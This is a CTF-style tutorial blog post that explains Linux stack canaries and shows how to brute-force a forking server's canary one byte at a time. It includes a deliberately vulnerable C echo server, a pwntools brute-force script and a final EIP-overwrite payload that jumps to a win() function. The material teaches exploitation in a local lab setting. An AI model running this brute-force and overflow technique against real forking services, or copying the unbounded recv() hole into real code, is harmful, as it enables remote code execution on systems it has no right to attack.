And now for something more CTF-y: Dealing with stack canaries by brute-forcing their value byte by byte.
How Stack Canaries Work
If you’ve ever read the error message *** stack smashing detected ***: <...> terminated
, you’ve already encountered stack canaries in action. They are being used to detect and stop buffer overflows by placing a per-process randomized value between the local variables and the saved return address. If an attacker somehow manages to write across the boundary of a buffer in order to overwrite the saved return address, he will also overwrite the canary. The program will check whether the canary is still intact prior to returning from a function and aborts in case it has been altered. This causes the vulnerable application to never actually load the overwritten return address into the instruction pointer because it terminates instead. The following animation shows a successful canary check and a failed one - keep an eye on the EAX
register which holds the result of the canary check. If it’s all zeroes, the check has succeeded. In every other case the application will not skip the call sym.__stack_chk_fail_local
instruction after the check, which causes the application to terminate:
The check is being performed as follows:
mov eax, dword [var_1ch]
: Load the stack canary of the current function intoEAX
xor eax, dword gs:[0x14]
: Perform a XOR operation on the value inEAX
with the saved stack canary, which is present in a register calledGS
. This register is reserved for stack canaries in the Linux kernel. You can read more about this in the comments of the kernel source code.je 0x8049333
: The previous XOR operation has set the zero flag to1
in case the XOR operation’s result was0
. This jump operation causes the program flow to skip the next call and continue execution normally.- In case of a failed check:
call sym.__stack_chk_fail_local
causes the application to terminate.
The size of stack canaries is depending on the running application. It’s always the native size, so it will be 32 bits for 32-bit processes.
Stack Canaries On Linux
The Linux kernel causes the least significant bit (LSB) of the canary to be always 0x00
. The idea here is that it may not be possible for attackers to write a zero byte in a buffer overflow attack since many functions that operate in strings terminate on such a value. An example of this is strcpy()
- however other functions such as recv()
allow writing zero bytes. Therefore the exploitability can depend on the function call that’s in use. The following animation demonstrates that by overwriting the LSB after a recv()
, which is the first byte we reach when overwriting, with a 0x00
causes the remote process not to crash since this value is always expected to be a zero byte.
A second aspect to keep in mind is that fork()
calls effectively create a copy of the parent process. So when a process spawns child processes using this system call, all child processes will have the same value for a valid stack canary. This is unlike exec*()
operations where the current process gets replaced by an entirely new one. Because of this aspect, the brute-force approach becomes possible.
The Target
Consider the following echo server that’s using fork()
to spawn a child process for every connection (return vales not checked for shorter code listing):
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define PORT 2223
void pwned(int socket)
{
char data[64];
bzero(data, sizeof(data));
// overflow happens here
recv(socket, data, 1024, 0);
if (strlen(data))
{
printf("[*] Received: %s\n", data);
send(socket, data, strlen(data), 0);
}
}
void win()
{
printf("EIP Overwrite Worked :)\n");
}
int main()
{
int sockfd, ret;
struct sockaddr_in serverAddr;
int newSocket;
struct sockaddr_in newAddr;
socklen_t addr_size;
char buffer[1024];
pid_t childpid;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
memset(&serverAddr, '\0', sizeof(serverAddr));
serverAddr.sin_family = AF_INET;
serverAddr.sin_port = htons(PORT);
serverAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
ret = bind(sockfd, (struct sockaddr *)&serverAddr, sizeof(serverAddr));
if (listen(sockfd, 10) == 0)
{
printf("[+] Listening....\n");
}
else {
printf("[-] Error Binding to Port\n");
}
while (1)
{
newSocket = accept(sockfd, (struct sockaddr *)&newAddr, &addr_size);
printf("[*] Got Connection from %s:%d\n", inet_ntoa(newAddr.sin_addr), ntohs(newAddr.sin_port));
if ((childpid = fork()) == 0)
{
close(sockfd);
pwned(newSocket);
// if this works then no buffer overflow has occurred
send(newSocket, "OK\n", strlen("OK\n"), 0);
}
else
{
close(newSocket);
}
}
return 0;
}
This has to be compiled with gcc -m32 server.c -o server -no-pie
for the sake of this tutorial. The -no-pie
flag disables PIE (yes really) and causes the function win()
which we want to call to be at a predictable address: 0x0804933b
in my case. This was determined using radare2
with aaa;afl~win
.
Brute-Forcing the Canary Value
This is the plan:
Starting from the LSB, which is already known, the brute-force script will try all possible values for each of the remaining three bytes. It can detect whether the current byte has been guessed correctly in case the remote process doesn’t crash. In case no crash occurred, it can move on to the next byte to guess.
Using pwntools
, we are able to set up the brute-forcing quickly. Also, it’s possible to detect remote crashes by checking whether the echo response contains OK
. This happens after the vulnerable function and can only happen in case no crash occurred.
#!/usr/bin/env python2
from pwn import *
import time
import struct
PADDING = 64
canary = [0x00]
for cb in range(3):
currentByte = 0x00
for i in range(255):
print "[+] Trying %s (Byte #%d)..." % (hex(currentByte), cb + 2)
r = remote("localhost", 2223)
DATA = "A" * PADDING
DATA += "".join([struct.pack("B", c) for c in canary])
DATA += struct.pack("B", currentByte)
r.clean()
r.send(DATA)
received = ""
try:
received = r.recvuntil("OK")
except EOFError:
print "Process Died"
finally:
r.close()
if "OK" in received:
canary.append(currentByte)
print "\n[*] Byte #%d is %s\n" % (cb + 2, hex(currentByte))
currentByte = 0
break
else:
currentByte += 1
print "Found Canary:"
print " ".join([hex(c) for c in canary])
Using some radare2
magic it’s possible to attach to the child process that will be targeted for an exploit and see how they behave after successfully brute forcing the correct canary value using the script above:
These radare2
commands have been used:
e dbg.forks = true
: This causesradare2
to break in case the currently debugged process spawned a child process withfork()
dp
lists the current PID and all childrendp=<PID>
selects the new process to debug, in this case the new child processdb sym.pwned
sets a breakpoint in the vulnerable function
As can be seen in the animation above, the canary check was passed and the EIP
register has been successfully overwritten with 0x41414141
. The only thing to do now is to overwrite this instruction pointer with the address of the win()
function. Let’s use pwntools
again:
PADDING = 64
EIP = p32(0x0804933b)
r = remote("localhost", 2223)
DATA = "A" * PADDING
DATA += "".join([struct.pack("B", c) for c in canary])
DATA += "B" * 28 # Additional padding
DATA += EIP
Done :)
Peace out and happy CTF-ing.